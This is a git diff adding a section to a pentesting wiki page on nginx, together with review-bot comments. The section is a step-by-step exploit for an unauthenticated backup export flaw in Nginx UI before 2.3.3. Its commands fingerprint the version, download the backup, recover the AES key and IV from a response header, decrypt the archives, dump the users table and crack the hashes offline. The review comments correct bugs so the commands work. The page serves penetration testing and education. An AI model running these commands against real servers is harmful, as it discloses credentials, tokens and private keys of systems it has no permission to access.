56 changes: 56 additions & 0 deletions src/network-services-pentesting/pentesting-web/nginx.md
Expand Up @@ -379,6 +379,59 @@ rg -n "keepalive_requests" /etc/nginx/

Hosts that reveal unusually high values for those directives are prime targets: one HTTP/2 client can loop through stream creation and instant `RST_STREAM` frames to keep CPU pegged without tripping the concurrency cap.

## Nginx UI pre-auth backup export + crypto material leakage

**Nginx UI** is a separate admin panel for nginx, not the nginx daemon itself. In **Nginx UI < 2.3.3**, the backup export endpoint may be reachable **without authentication** and the response can also leak the **AES-256-CBC key and IV** needed to decrypt the backup via the `X-Backup-Security` header. This turns an "encrypted backup download" into immediate **credential / token / private-key disclosure**.

### Fast version fingerprinting from SPA assets

If the login page is a JS-heavy SPA, pull the main bundle from `/` and look for a dedicated version chunk:

```bash
curl -s http://admin.example/ | grep -oP 'assets/index-[^"]+\.js'
curl -s http://admin.example/assets/index-<hash>.js | grep -oP 'version[-\\w]*\\.js'
curl -s http://admin.example/assets/version-<hash>.js
```

On vulnerable Nginx UI builds this often returns a literal such as `const t="2.3.2"`, which is enough to match the vulnerable range before authenticating.

### Check exposed API endpoints and pull the backup

Even when most `/api/*` routes return `403`, test backup-style endpoints directly:

```bash
curl -s http://admin.example/api/install
curl -s -D headers.txt -o backup.zip http://admin.example/api/backup
grep -i '^X-Backup-Security:' headers.txt
unzip -l backup.zip
```

If vulnerable, `X-Backup-Security` contains `base64(key):base64(iv)`. Decode both values and confirm the expected lengths (**32-byte key**, **16-byte IV**):

```bash
KEY_B64='<base64-key>'; IV_B64='<base64-iv>'
KEY_HEX=$(printf '%s' "$KEY_B64" | base64 -d | xxd -p -c 0)
IV_HEX=$(printf '%s' "$IV_B64" | base64 -d | xxd -p -c 0)
unzip backup.zip -d backup
openssl enc -aes-256-cbc -d -in backup/hash_info.txt -out hash_info.txt -K "$KEY_HEX" -iv "$IV_HEX"
openssl enc -aes-256-cbc -d -in backup/nginx.zip -out nginx_dec.zip -K "$KEY_HEX" -iv "$IV_HEX"
openssl enc -aes-256-cbc -d -in backup/nginx-ui.zip -out nginx-ui_dec.zip -K "$KEY_HEX" -iv "$IV_HEX"
```

After decryption, inspect the recovered nginx configs and the Nginx UI application data. A common post-exploitation path is:

- Extract reverse-proxy and vhost details from `nginx_dec.zip`
- Inspect `nginx-ui_dec.zip` for `app.ini`, `database.db`, API tokens, or certificate material
- Dump the SQLite `users` table and crack recovered password hashes offline

```bash
unzip nginx-ui_dec.zip -d nginx-ui
sqlite3 nginx-ui/database.db 'select name,password from users;'
hashcat -m 3200 hashes.txt <wordlist>
```

This pattern is worth testing in other admin products too: **an unauthenticated "encrypted" export is still plaintext disclosure if the response leaks the decryption material or stores it alongside the archive.**

## Try it yourself

Detectify has created a GitHub repository where you can use Docker to set up your own vulnerable Nginx test server with some of the misconfigurations discussed in this article and try finding them yourself!
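Review bot: the second fingerprinting command in the "Fast version fingerprinting" block can never match, because the backslashes are doubled inside single quotes: `grep -oP 'version[-\\w]*\\.js'` hands PCRE a character class of `-`, `\` and `w` and then demands a literal backslash before `.js`, so it should read `grep -oP 'version[-\w]*\.js'`, matching the single-escaped `\.js` used in the line just above it. Two smaller points in the same hunk: the cracking step reads `hashcat -m 3200 hashes.txt <wordlist>`, but the preceding `sqlite3 nginx-ui/database.db 'select name,password from users;'` only prints to stdout and nothing ever writes `hashes.txt`, so either redirect a `select password from users;` query into that file or keep the name column and add `--username` (and confirm the recovered hashes carry a bcrypt `$2a$`/`$2b$` prefix before committing to mode 3200); and `xxd -p -c 0` is only honoured by newer xxd builds, while older ones wrap a 32-byte key at 30 octets and the embedded newline then breaks `openssl enc -K`, so `xxd -p | tr -d '\n'` is the portable form for both `KEY_HEX` and `IV_HEX`.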
Expand All @@ -405,6 +458,9 @@ Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulne
- [**https://mailman.nginx.org/pipermail/nginx-announce/2024/GWH2WZDVCOC2A5X67GKIMJM4YRELTR77.html**](https://mailman.nginx.org/pipermail/nginx-announce/2024/GWH2WZDVCOC2A5X67GKIMJM4YRELTR77.html)
- [**https://mailman.nginx.org/pipermail/nginx-announce/2025/NYEUJX7NCBCGJGXDFVXNMAAMJDFSE45G.html**](https://mailman.nginx.org/pipermail/nginx-announce/2025/NYEUJX7NCBCGJGXDFVXNMAAMJDFSE45G.html)
- [**https://www.f5.com/company/blog/nginx/http-2-rapid-reset-attack-impacting-f5-nginx-products**](https://www.f5.com/company/blog/nginx/http-2-rapid-reset-attack-impacting-f5-nginx-products)
- [**https://0xdf.gitlab.io/2026/04/01/htb-snapped.html**](https://0xdf.gitlab.io/2026/04/01/htb-snapped.html)
- [**https://nvd.nist.gov/vuln/detail/CVE-2026-27944**](https://nvd.nist.gov/vuln/detail/CVE-2026-27944)
- [**https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-g9w5-qffc-6762**](https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-g9w5-qffc-6762)


{{#include ../../banners/hacktricks-training.md}}
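Review bot: the three new references are the only place the advisory identifiers appear, so a reader of the new "Nginx UI pre-auth backup export" section has no way to tie its "In **Nginx UI < 2.3.3**" claim to `CVE-2026-27944` or `GHSA-g9w5-qffc-6762`; cite both identifiers in that section's first paragraph (or its heading) and state there that 2.3.3 is the first release without the issue, so the version check and the references line up without the reader scrolling to the bottom of the page.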